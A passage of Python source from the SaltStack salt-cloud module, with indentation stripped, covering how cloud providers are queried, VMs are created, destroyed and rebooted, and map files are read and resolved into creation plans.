raise SaltCloudSystemExit("There are no cloud profiles configured.")
if provider != "all":
return provider_profiles
return profiles
def map_providers(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
pmap = {}
for alias, drivers in six.iteritems(self.opts["providers"]):
for driver, details in six.iteritems(drivers):
fun = "{0}.{1}".format(driver, query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
if alias not in pmap:
pmap[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
pmap[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.debug(
"Failed to execute '%s()' while querying for "
"running nodes: %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
# Failed to communicate with the provider, don't list any
# nodes
pmap[alias][driver] = []
self.__cached_provider_queries[query] = pmap
return pmap
def map_providers_parallel(self, query="list_nodes", cached=False):
"""
Return a mapping of what named VMs are running on what VM providers
based on what providers are defined in the configuration and VMs
Same as map_providers but query in parallel.
"""
if cached is True and query in self.__cached_provider_queries:
return self.__cached_provider_queries[query]
opts = self.opts.copy()
multiprocessing_data = []
# Optimize Providers
opts["providers"] = self._optimize_providers(opts["providers"])
for alias, drivers in six.iteritems(opts["providers"]):
# Make temp query for this driver to avoid overwrite next
this_query = query
for driver, details in six.iteritems(drivers):
# If driver has function list_nodes_min, just replace it
# with query param to check existing vms on this driver
# for minimum information, Otherwise still use query param.
if (
opts.get("selected_query_option") is None
and "{0}.list_nodes_min".format(driver) in self.clouds
):
this_query = "list_nodes_min"
fun = "{0}.{1}".format(driver, this_query)
if fun not in self.clouds:
log.error("Public cloud provider %s is not available", driver)
continue
multiprocessing_data.append(
{
"fun": fun,
"opts": opts,
"query": this_query,
"alias": alias,
"driver": driver,
}
)
output = {}
if not multiprocessing_data:
return output
data_count = len(multiprocessing_data)
pool = multiprocessing.Pool(
data_count < 10 and data_count or 10, init_pool_worker
)
parallel_pmap = enter_mainloop(
_run_parallel_map_providers_query, multiprocessing_data, pool=pool
)
for alias, driver, details in parallel_pmap:
if not details:
# There's no providers details?! Skip it!
continue
if alias not in output:
output[alias] = {}
output[alias][driver] = details
self.__cached_provider_queries[query] = output
return output
def get_running_by_names(
self, names, query="list_nodes", cached=False, profile=None
):
if isinstance(names, six.string_types):
names = [names]
matches = {}
handled_drivers = {}
mapped_providers = self.map_providers_parallel(query, cached=cached)
for alias, drivers in six.iteritems(mapped_providers):
for driver, vms in six.iteritems(drivers):
if driver not in handled_drivers:
handled_drivers[driver] = alias
# When a profile is specified, only return an instance
# that matches the provider specified in the profile.
# This solves the issues when many providers return the
# same instance. For example there may be one provider for
# each availability zone in amazon in the same region, but
# the search returns the same instance for each provider
# because amazon returns all instances in a region, not
# availability zone.
if (
profile
and alias
not in self.opts["profiles"][profile]["provider"].split(":")[0]
):
continue
for vm_name, details in six.iteritems(vms):
# XXX: The logic below can be removed once the aws driver
# is removed
if vm_name not in names:
continue
elif (
driver == "ec2"
and "aws" in handled_drivers
and "aws" in matches[handled_drivers["aws"]]
and vm_name in matches[handled_drivers["aws"]]["aws"]
):
continue
elif (
driver == "aws"
and "ec2" in handled_drivers
and "ec2" in matches[handled_drivers["ec2"]]
and vm_name in matches[handled_drivers["ec2"]]["ec2"]
):
continue
if alias not in matches:
matches[alias] = {}
if driver not in matches[alias]:
matches[alias][driver] = {}
matches[alias][driver][vm_name] = details
return matches
def _optimize_providers(self, providers):
"""
Return an optimized mapping of available providers
"""
new_providers = {}
provider_by_driver = {}
for alias, driver in six.iteritems(providers):
for name, data in six.iteritems(driver):
if name not in provider_by_driver:
provider_by_driver[name] = {}
provider_by_driver[name][alias] = data
for driver, providers_data in six.iteritems(provider_by_driver):
fun = "{0}.optimize_providers".format(driver)
if fun not in self.clouds:
log.debug("The '%s' cloud driver is unable to be optimized.", driver)
for name, prov_data in six.iteritems(providers_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
continue
new_data = self.clouds[fun](providers_data)
if new_data:
for name, prov_data in six.iteritems(new_data):
if name not in new_providers:
new_providers[name] = {}
new_providers[name][driver] = prov_data
return new_providers
def location_list(self, lookup="all"):
"""
Return a mapping of all location data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_locations".format(driver)
if fun not in self.clouds:
# The capability to gather locations is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the locations information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def image_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_images".format(driver)
if fun not in self.clouds:
# The capability to gather images is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the images information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def size_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
fun = "{0}.avail_sizes".format(driver)
if fun not in self.clouds:
# The capability to gather sizes is not supported by this
# cloud module
log.debug(
"The '%s' cloud driver defined under '%s' provider "
"alias is unable to get the sizes information",
driver,
alias,
)
continue
if alias not in data:
data[alias] = {}
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
data[alias][driver] = self.clouds[fun]()
except Exception as err: # pylint: disable=broad-except
log.error(
"Failed to get the output of '%s()': %s",
fun,
err,
exc_info_on_loglevel=logging.DEBUG,
)
return data
def provider_list(self, lookup="all"):
"""
Return a mapping of all image data for available providers
"""
data = {}
lookups = self.lookup_providers(lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def profile_list(self, provider, lookup="all"):
"""
Return a mapping of all configured profiles
"""
data = {}
lookups = self.lookup_profiles(provider, lookup)
if not lookups:
return data
for alias, driver in lookups:
if alias not in data:
data[alias] = {}
if driver not in data[alias]:
data[alias][driver] = {}
return data
def create_all(self):
"""
Create/Verify the VMs in the VM data
"""
ret = []
for vm_name, vm_details in six.iteritems(self.opts["profiles"]):
ret.append({vm_name: self.create(vm_details)})
return ret
def destroy(self, names, cached=False):
"""
Destroy the named VMs
"""
processed = {}
names = set(names)
matching = self.get_running_by_names(names, cached=cached)
vms_to_destroy = set()
parallel_data = []
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for name in vms:
if name in names:
vms_to_destroy.add((alias, driver, name))
if self.opts["parallel"]:
parallel_data.append(
{
"opts": self.opts,
"name": name,
"alias": alias,
"driver": driver,
}
)
# destroying in parallel
if self.opts["parallel"] and parallel_data:
# set the pool size based on configuration or default to
# the number of machines we're destroying
if "pool_size" in self.opts:
pool_size = self.opts["pool_size"]
else:
pool_size = len(parallel_data)
log.info("Destroying in parallel mode; " "Cloud pool size: %s", pool_size)
# kick off the parallel destroy
output_multip = enter_mainloop(
_destroy_multiprocessing, parallel_data, pool_size=pool_size
)
# massage the multiprocessing output a bit
ret_multip = {}
for obj in output_multip:
ret_multip.update(obj)
# build up a data structure similar to what the non-parallel
# destroy uses
for obj in parallel_data:
alias = obj["alias"]
driver = obj["driver"]
name = obj["name"]
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret_multip[name]
if name in names:
names.remove(name)
# not destroying in parallel
else:
log.info("Destroying in non-parallel mode.")
for alias, driver, name in vms_to_destroy:
fun = "{0}.destroy".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
ret = self.clouds[fun](name)
if alias not in processed:
processed[alias] = {}
if driver not in processed[alias]:
processed[alias][driver] = {}
processed[alias][driver][name] = ret
if name in names:
names.remove(name)
# now the processed data structure contains the output from either
# the parallel or non-parallel destroy and we should finish up
# with removing minion keys if necessary
for alias, driver, name in vms_to_destroy:
ret = processed[alias][driver][name]
if not ret:
continue
vm_ = {
"name": name,
"profile": None,
"provider": ":".join([alias, driver]),
"driver": driver,
}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
key_file = os.path.join(
self.opts["pki_dir"], "minions", minion_dict.get("id", name)
)
globbed_key_file = glob.glob("{0}.*".format(key_file))
if not os.path.isfile(key_file) and not globbed_key_file:
# There's no such key file!? It might have been renamed
if isinstance(ret, dict) and "newname" in ret:
salt.utils.cloud.remove_key(self.opts["pki_dir"], ret["newname"])
continue
if os.path.isfile(key_file) and not globbed_key_file:
# Single key entry. Remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(key_file)
)
continue
# Since we have globbed matches, there are probably some keys for which their minion
# configuration has append_domain set.
if (
not os.path.isfile(key_file)
and globbed_key_file
and len(globbed_key_file) == 1
):
# Single entry, let's remove it!
salt.utils.cloud.remove_key(
self.opts["pki_dir"], os.path.basename(globbed_key_file[0])
)
continue
# Since we can't get the profile or map entry used to create
# the VM, we can't also get the append_domain setting.
# And if we reached this point, we have several minion keys
# who's name starts with the machine name we're deleting.
# We need to ask one by one!?
print(
"There are several minion keys who's name starts "
"with '{0}'. We need to ask you which one should be "
"deleted:".format(name)
)
while True:
for idx, filename in enumerate(globbed_key_file):
print(" {0}: {1}".format(idx, os.path.basename(filename)))
selection = input("Which minion key should be deleted(number)? ")
try:
selection = int(selection)
except ValueError:
print("'{0}' is not a valid selection.".format(selection))
try:
filename = os.path.basename(globbed_key_file.pop(selection))
except Exception: # pylint: disable=broad-except
continue
delete = input("Delete '{0}'? [Y/n]? ".format(filename))
if delete == "" or delete.lower().startswith("y"):
salt.utils.cloud.remove_key(self.opts["pki_dir"], filename)
print("Deleted '{0}'".format(filename))
break
print("Did not delete '{0}'".format(filename))
break
if names and not processed:
# These machines were asked to be destroyed but could not be found
raise SaltCloudSystemExit(
"The following VM's were not found: {0}".format(", ".join(names))
)
elif names and processed:
processed["Not Found"] = names
elif not processed:
raise SaltCloudSystemExit("No machines were destroyed!")
return processed
def reboot(self, names):
"""
Reboot the named VMs
"""
ret = []
pmap = self.map_providers_parallel()
acts = {}
for prov, nodes in six.iteritems(pmap):
acts[prov] = []
for node in nodes:
if node in names:
acts[prov].append(node)
for prov, names_ in six.iteritems(acts):
fun = "{0}.reboot".format(prov)
for name in names_:
ret.append({name: self.clouds[fun](name)})
return ret
def create(self, vm_, local_master=True):
"""
Create a single VM
"""
output = {}
minion_dict = salt.config.get_cloud_config_value(
"minion", vm_, self.opts, default={}
)
alias, driver = vm_["provider"].split(":")
fun = "{0}.create".format(driver)
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
vm_["name"],
vm_["provider"],
driver,
)
return
deploy = salt.config.get_cloud_config_value("deploy", vm_, self.opts)
make_master = salt.config.get_cloud_config_value("make_master", vm_, self.opts)
if deploy:
if not make_master and "master" not in minion_dict:
log.warning(
"There's no master defined on the '%s' VM settings.", vm_["name"]
)
if "pub_key" not in vm_ and "priv_key" not in vm_:
log.debug("Generating minion keys for '%s'", vm_["name"])
priv, pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["pub_key"] = pub
vm_["priv_key"] = priv
else:
# Note(pabelanger): We still reference pub_key and priv_key when
# deploy is disabled.
vm_["pub_key"] = None
vm_["priv_key"] = None
key_id = minion_dict.get("id", vm_["name"])
domain = vm_.get("domain")
if vm_.get("use_fqdn") and domain:
minion_dict["append_domain"] = domain
if "append_domain" in minion_dict:
key_id = ".".join([key_id, minion_dict["append_domain"]])
if make_master is True and "master_pub" not in vm_ and "master_pem" not in vm_:
log.debug("Generating the master keys for '%s'", vm_["name"])
master_priv, master_pub = salt.utils.cloud.gen_keys(
salt.config.get_cloud_config_value("keysize", vm_, self.opts)
)
vm_["master_pub"] = master_pub
vm_["master_pem"] = master_priv
if local_master is True and deploy is True:
# Accept the key on the local master
salt.utils.cloud.accept_key(self.opts["pki_dir"], vm_["pub_key"], key_id)
vm_["os"] = salt.config.get_cloud_config_value("script", vm_, self.opts)
try:
vm_["inline_script"] = salt.config.get_cloud_config_value(
"inline_script", vm_, self.opts
)
except KeyError:
pass
try:
alias, driver = vm_["provider"].split(":")
func = "{0}.create".format(driver)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
output = self.clouds[func](vm_)
if output is not False and "sync_after_install" in self.opts:
if self.opts["sync_after_install"] not in (
"all",
"modules",
"states",
"grains",
):
log.error("Bad option for sync_after_install")
return output
# A small pause helps the sync work more reliably
time.sleep(3)
start = int(time.time())
while int(time.time()) < start + 60:
# We'll try every <timeout> seconds, up to a minute
mopts_ = salt.config.DEFAULT_MASTER_OPTS
conf_path = "/".join(self.opts["conf_file"].split("/")[:-1])
mopts_.update(
salt.config.master_config(os.path.join(conf_path, "master"))
)
client = salt.client.get_local_client(mopts=mopts_)
ret = client.cmd(
vm_["name"],
"saltutil.sync_{0}".format(self.opts["sync_after_install"]),
timeout=self.opts["timeout"],
)
if ret:
log.info(
six.u(
"Synchronized the following dynamic modules: " " {0}"
).format(ret)
)
break
except KeyError as exc:
log.exception(
"Failed to create VM %s. Configuration value %s needs " "to be set",
vm_["name"],
exc,
)
# If it's a map then we need to respect the 'requires'
# so we do it later
try:
opt_map = self.opts["map"]
except KeyError:
opt_map = False
if self.opts["parallel"] and self.opts["start_action"] and not opt_map:
log.info("Running %s on %s", self.opts["start_action"], vm_["name"])
client = salt.client.get_local_client(mopts=self.opts)
action_out = client.cmd(
vm_["name"],
self.opts["start_action"],
timeout=self.opts["timeout"] * 60,
)
output["ret"] = action_out
return output
@staticmethod
def vm_config(name, main, provider, profile, overrides):
"""
Create vm config.
:param str name: The name of the vm
:param dict main: The main cloud config
:param dict provider: The provider config
:param dict profile: The profile config
:param dict overrides: The vm's config overrides
"""
vm = main.copy()
vm = salt.utils.dictupdate.update(vm, provider)
vm = salt.utils.dictupdate.update(vm, profile)
vm.update(overrides)
vm["name"] = name
return vm
def extras(self, extra_):
"""
Extra actions
"""
output = {}
alias, driver = extra_["provider"].split(":")
fun = "{0}.{1}".format(driver, extra_["action"])
if fun not in self.clouds:
log.error(
"Creating '%s' using '%s' as the provider "
"cannot complete since '%s' is not available",
extra_["name"],
extra_["provider"],
driver,
)
return
try:
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=extra_["provider"]
):
output = self.clouds[fun](**extra_)
except KeyError as exc:
log.exception(
"Failed to perform %s.%s on %s. "
"Configuration value %s needs to be set",
extra_["provider"],
extra_["action"],
extra_["name"],
exc,
)
return output
def run_profile(self, profile, names, vm_overrides=None):
"""
Parse over the options passed on the command line and determine how to
handle them
"""
if profile not in self.opts["profiles"]:
msg = "Profile {0} is not defined".format(profile)
log.error(msg)
return {"Error": msg}
ret = {}
if not vm_overrides:
vm_overrides = {}
try:
with salt.utils.files.fopen(self.opts["conf_file"], "r") as mcc:
main_cloud_config = salt.utils.yaml.safe_load(mcc)
if not main_cloud_config:
main_cloud_config = {}
except KeyError:
main_cloud_config = {}
except IOError:
main_cloud_config = {}
if main_cloud_config is None:
main_cloud_config = {}
mapped_providers = self.map_providers_parallel()
profile_details = self.opts["profiles"][profile]
vms = {}
for prov, val in six.iteritems(mapped_providers):
prov_name = next(iter(val))
for node in mapped_providers[prov][prov_name]:
vms[node] = mapped_providers[prov][prov_name][node]
vms[node]["provider"] = prov
vms[node]["driver"] = prov_name
alias, driver = profile_details["provider"].split(":")
provider_details = self.opts["providers"][alias][driver].copy()
del provider_details["profiles"]
for name in names:
if name in vms:
prov = vms[name]["provider"]
driv = vms[name]["driver"]
msg = "{0} already exists under {1}:{2}".format(name, prov, driv)
log.error(msg)
ret[name] = {"Error": msg}
continue
vm_ = self.vm_config(
name,
main_cloud_config,
provider_details,
profile_details,
vm_overrides,
)
if self.opts["parallel"]:
process = multiprocessing.Process(target=self.create, args=(vm_,))
process.start()
ret[name] = {
"Provisioning": "VM being provisioned in parallel. "
"PID: {0}".format(process.pid)
}
continue
try:
# No need to inject __active_provider_name__ into the context
# here because self.create takes care of that
ret[name] = self.create(vm_)
if not ret[name]:
ret[name] = {"Error": "Failed to deploy VM"}
if len(names) == 1:
raise SaltCloudSystemExit("Failed to deploy VM")
continue
if self.opts.get("show_deploy_args", False) is False:
ret[name].pop("deploy_kwargs", None)
except (SaltCloudSystemExit, SaltCloudConfigError) as exc:
if len(names) == 1:
raise
ret[name] = {"Error": str(exc)}
return ret
def do_action(self, names, kwargs):
"""
Perform an action on a VM which may be specific to this cloud provider
"""
ret = {}
invalid_functions = {}
names = set(names)
for alias, drivers in six.iteritems(self.map_providers_parallel()):
if not names:
break
for driver, vms in six.iteritems(drivers):
if not names:
break
valid_function = True
fun = "{0}.{1}".format(driver, self.opts["action"])
if fun not in self.clouds:
log.info("'%s()' is not available. Not actioning...", fun)
valid_function = False
for vm_name, vm_details in six.iteritems(vms):
if not names:
break
if vm_name not in names:
if not isinstance(vm_details, dict):
vm_details = {}
if "id" in vm_details and vm_details["id"] in names:
vm_name = vm_details["id"]
else:
log.debug(
"vm:%s in provider:%s is not in name " "list:'%s'",
vm_name,
driver,
names,
)
continue
# Build the dictionary of invalid functions with their associated VMs.
if valid_function is False:
if invalid_functions.get(fun) is None:
invalid_functions.update({fun: []})
invalid_functions[fun].append(vm_name)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun],
__active_provider_name__=":".join([alias, driver]),
):
if alias not in ret:
ret[alias] = {}
if driver not in ret[alias]:
ret[alias][driver] = {}
# Clean kwargs of "__pub_*" data before running the cloud action call.
# Prevents calling positional "kwarg" arg before "call" when no kwarg
# argument is present in the cloud driver function's arg spec.
kwargs = salt.utils.args.clean_kwargs(**kwargs)
if kwargs:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, kwargs, call="action"
)
else:
ret[alias][driver][vm_name] = self.clouds[fun](
vm_name, call="action"
)
names.remove(vm_name)
# Set the return information for the VMs listed in the invalid_functions dict.
missing_vms = set()
if invalid_functions:
ret["Invalid Actions"] = invalid_functions
invalid_func_vms = set()
for key, val in six.iteritems(invalid_functions):
invalid_func_vms = invalid_func_vms.union(set(val))
# Find the VMs that are in names, but not in set of invalid functions.
missing_vms = names.difference(invalid_func_vms)
if missing_vms:
ret["Not Found"] = list(missing_vms)
ret["Not Actioned/Not Running"] = list(names)
if not names:
return ret
# Don't return missing VM information for invalid functions until after we've had a
# Chance to return successful actions. If a function is valid for one driver, but
# Not another, we want to make sure the successful action is returned properly.
if missing_vms:
return ret
# If we reach this point, the Not Actioned and Not Found lists will be the same,
# But we want to list both for clarity/consistency with the invalid functions lists.
ret["Not Actioned/Not Running"] = list(names)
ret["Not Found"] = list(names)
return ret
def do_function(self, prov, func, kwargs):
"""
Perform a function against a cloud provider
"""
matches = self.lookup_providers(prov)
if len(matches) > 1:
raise SaltCloudSystemExit(
"More than one results matched '{0}'. Please specify "
"one of: {1}".format(
prov,
", ".join(
["{0}:{1}".format(alias, driver) for (alias, driver) in matches]
),
)
)
alias, driver = matches.pop()
fun = "{0}.{1}".format(driver, func)
if fun not in self.clouds:
raise SaltCloudSystemExit(
"The '{0}' cloud provider alias, for the '{1}' driver, does "
"not define the function '{2}'".format(alias, driver, func)
)
log.debug("Trying to execute '%s' with the following kwargs: %s", fun, kwargs)
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if kwargs:
return {
alias: {driver: self.clouds[fun](call="function", kwargs=kwargs)}
}
return {alias: {driver: self.clouds[fun](call="function")}}
def __filter_non_working_providers(self):
"""
Remove any mis-configured cloud providers from the available listing
"""
for alias, drivers in six.iteritems(self.opts["providers"].copy()):
for driver in drivers.copy():
fun = "{0}.get_configured_provider".format(driver)
if fun not in self.clouds:
# Mis-configured provider that got removed?
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias, could not be loaded. "
"Please check your provider configuration files and "
"ensure all required dependencies are installed "
"for the '%s' driver.\n"
"In rare cases, this could indicate the '%s()' "
"function could not be found.\nRemoving '%s' from "
"the available providers list",
driver,
alias,
driver,
fun,
driver,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
continue
with salt.utils.context.func_globals_inject(
self.clouds[fun], __active_provider_name__=":".join([alias, driver])
):
if self.clouds[fun]() is False:
log.warning(
"The cloud driver, '%s', configured under the "
"'%s' cloud provider alias is not properly "
"configured. Removing it from the available "
"providers list.",
driver,
alias,
)
self.opts["providers"][alias].pop(driver)
if alias not in self.opts["providers"]:
continue
if not self.opts["providers"][alias]:
self.opts["providers"].pop(alias)
class Map(Cloud):
"""
Create a VM stateful map execution object
"""
def __init__(self, opts):
Cloud.__init__(self, opts)
self.rendered_map = self.read()
def interpolated_map(self, query="list_nodes", cached=False):
rendered_map = self.read().copy()
interpolated_map = {}
for profile, mapped_vms in six.iteritems(rendered_map):
names = set(mapped_vms)
if profile not in self.opts["profiles"]:
if "Errors" not in interpolated_map:
interpolated_map["Errors"] = {}
msg = (
"No provider for the mapped '{0}' profile was found. "
"Skipped VMS: {1}".format(profile, ", ".join(names))
)
log.info(msg)
interpolated_map["Errors"][profile] = msg
continue
matching = self.get_running_by_names(names, query, cached)
for alias, drivers in six.iteritems(matching):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = vm_details
try:
names.remove(vm_name)
except KeyError:
# If it's not there, then our job is already done
pass
if not names:
continue
profile_details = self.opts["profiles"][profile]
alias, driver = profile_details["provider"].split(":")
for vm_name in names:
if alias not in interpolated_map:
interpolated_map[alias] = {}
if driver not in interpolated_map[alias]:
interpolated_map[alias][driver] = {}
interpolated_map[alias][driver][vm_name] = "Absent"
return interpolated_map
def delete_map(self, query=None):
query_map = self.interpolated_map(query=query)
for alias, drivers in six.iteritems(query_map.copy()):
for driver, vms in six.iteritems(drivers.copy()):
for vm_name, vm_details in six.iteritems(vms.copy()):
if vm_details == "Absent":
query_map[alias][driver].pop(vm_name)
if not query_map[alias][driver]:
query_map[alias].pop(driver)
if not query_map[alias]:
query_map.pop(alias)
return query_map
def get_vmnames_by_action(self, action):
query_map = self.interpolated_map("list_nodes")
matching_states = {
"start": ["stopped"],
"stop": ["running", "active"],
"reboot": ["running", "active"],
}
vm_names = []
for alias, drivers in six.iteritems(query_map):
for driver, vms in six.iteritems(drivers):
for vm_name, vm_details in six.iteritems(vms):
# Only certain actions are support in to use in this case. Those actions are the
# "Global" salt-cloud actions defined in the "matching_states" dictionary above.
# If a more specific action is passed in, we shouldn't stack-trace - exit gracefully.
try:
state_action = matching_states[action]
except KeyError:
log.error(
"The use of '%s' as an action is not supported "
"in this context. Only 'start', 'stop', and "
"'reboot' are supported options.",
action,
)
raise SaltCloudException()
if (
vm_details != "Absent"
and vm_details["state"].lower() in state_action
):
vm_names.append(vm_name)
return vm_names
def read(self):
"""
Read in the specified map and return the map structure
"""
map_ = None
if self.opts.get("map", None) is None:
if self.opts.get("map_data", None) is None:
if self.opts.get("map_pillar", None) is None:
pass
elif self.opts.get("map_pillar") not in self.opts.get("maps"):
log.error(
"The specified map not found in pillar at " "'cloud:maps:%s'",
self.opts["map_pillar"],
)
raise SaltCloudNotFound()
else:
# 'map_pillar' is provided, try to use it
map_ = self.opts["maps"][self.opts.get("map_pillar")]
else:
# 'map_data' is provided, try to use it
map_ = self.opts["map_data"]
else:
# 'map' is provided, try to use it
local_minion_opts = copy.deepcopy(self.opts)
local_minion_opts["file_client"] = "local"
self.minion = salt.minion.MasterMinion(local_minion_opts)
if not os.path.isfile(self.opts["map"]):
if not (self.opts["map"]).startswith("salt://"):
log.error(
"The specified map file does not exist: '%s'", self.opts["map"]
)
raise SaltCloudNotFound()
if (self.opts["map"]).startswith("salt://"):
cached_map = self.minion.functions["cp.cache_file"](self.opts["map"])
else:
cached_map = self.opts["map"]
try:
renderer = self.opts.get("renderer", "jinja|yaml")
rend = salt.loader.render(self.opts, {})
blacklist = self.opts.get("renderer_blacklist")
whitelist = self.opts.get("renderer_whitelist")
map_ = compile_template(
cached_map, rend, renderer, blacklist, whitelist
)
except Exception as exc: # pylint: disable=broad-except
log.error(
"Rendering map %s failed, render error:\n%s",
self.opts["map"],
exc,
exc_info_on_loglevel=logging.DEBUG,
)
return {}
if "include" in map_:
map_ = salt.config.include_config(map_, self.opts["map"], verbose=False)
if not map_:
return {}
# Create expected data format if needed
for profile, mapped in six.iteritems(map_.copy()):
if isinstance(mapped, (list, tuple)):
entries = {}
for mapping in mapped:
if isinstance(mapping, six.string_types):
# Foo:
# - bar1
# - bar2
mapping = {mapping: None}
for name, overrides in six.iteritems(mapping):
if overrides is None or isinstance(overrides, bool):
# Foo:
# - bar1:
# - bar2:
overrides = {}
try:
overrides.setdefault("name", name)
except AttributeError:
log.error(
"Cannot use 'name' as a minion id in a cloud map as it "
"is a reserved word. Please change 'name' to a different "
"minion id reference."
)
return {}
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, dict):
# Convert the dictionary mapping to a list of dictionaries
# Foo:
# bar1:
# grains:
# foo: bar
# bar2:
# grains:
# foo: bar
entries = {}
for name, overrides in six.iteritems(mapped):
overrides.setdefault("name", name)
entries[name] = overrides
map_[profile] = entries
continue
if isinstance(mapped, six.string_types):
# If it's a single string entry, let's make iterable because of
# the next step
mapped = [mapped]
map_[profile] = {}
for name in mapped:
map_[profile][name] = {"name": name}
return map_
def _has_loop(self, dmap, seen=None, val=None):
if seen is None:
for values in six.itervalues(dmap["create"]):
seen = []
try:
machines = values["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
else:
if val in seen:
return True
seen.append(val)
try:
machines = dmap["create"][val]["requires"]
except KeyError:
machines = []
for machine in machines:
if self._has_loop(dmap, seen=list(seen), val=machine):
return True
return False
def _calcdep(self, dmap, machine, data, level):
try:
deplist = data["requires"]
except KeyError:
return level
levels = []
for name in deplist:
try:
data = dmap["create"][name]
except KeyError:
try:
data = dmap["existing"][name]
except KeyError:
msg = "Missing dependency in cloud map"
log.error(msg)
raise SaltCloudException(msg)
levels.append(self._calcdep(dmap, name, data, level))
level = max(levels) + 1
return level
def map_data(self, cached=False):
"""
Create a data map of what to execute on
"""
ret = {"create": {}}
pmap = self.map_providers_parallel(cached=cached)
exist = set()
defined = set()
rendered_map = copy.deepcopy(self.rendered_map)
for profile_name, nodes in six.iteritems(rendered_map):
if profile_name not in self.opts["profiles"]:
msg = (
"The required profile, '{0}', defined in the map "
"does not exist. The defined nodes, {1}, will not "
"be created.".format(
profile_name, ", ".join("'{0}'".format(node) for node in nodes)
)
)
log.error(msg)
if "errors" not in ret:
ret["errors"] = {}
ret["errors"][profile_name] = msg
continue
profile_data = self.opts["profiles"].get(profile_name)
for nodename, overrides in six.iteritems(nodes):
# Get associated provider data, in case something like size
# or image is specified in the provider file. See issue #32510.
if (
"provider" in overrides
and overrides["provider"] != profile_data["provider"]
):
alias, driver = overrides.get("provider").split(":")
else:
alias, driver = profile_data.get("provider").split(":")
provider_details = copy.deepcopy(self.opts["providers"][alias][driver])
del provider_details["profiles"]
# Update the provider details information with profile data
# Profile data and node overrides should override provider data, if defined.
# This keeps map file data definitions consistent with -p usage.
salt.utils.dictupdate.update(provider_details, profile_data)
nodedata = copy.deepcopy(provider_details)
# Update profile data with the map overrides
for setting in ("grains", "master", "minion", "volumes", "requires"):
deprecated = "map_{0}".format(setting)
if deprecated in overrides:
log.warning(
"The use of '%s' on the '%s' mapping has "
"been deprecated. The preferred way now is to "
"just define '%s'. For now, salt-cloud will do "
"the proper thing and convert the deprecated "
"mapping into the preferred one.",
deprecated,
nodename,
setting,
)
overrides[setting] = overrides.pop(deprecated)
# merge minion grains from map file
if (
"minion" in overrides
and "minion" in nodedata
and "grains" in overrides["minion"]
and "grains" in nodedata["minion"]
):
nodedata["minion"]["grains"].update(overrides["minion"]["grains"])
del overrides["minion"]["grains"]
# remove minion key if now is empty dict
if not overrides["minion"]:
del overrides["minion"]
nodedata = salt.utils.dictupdate.update(nodedata, overrides)
# Add the computed information to the return data
ret["create"][nodename] = nodedata
# Add the node name to the defined set
alias, driver = nodedata["provider"].split(":")
defined.add((alias, driver, nodename))
def get_matching_by_name(name):
matches = {}
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
for vm_name, details in six.iteritems(vms):
if vm_name == name and driver not in matches:
matches[driver] = details["state"]
return matches
for alias, drivers in six.iteritems(pmap):
for driver, vms in six.iteritems(drivers):
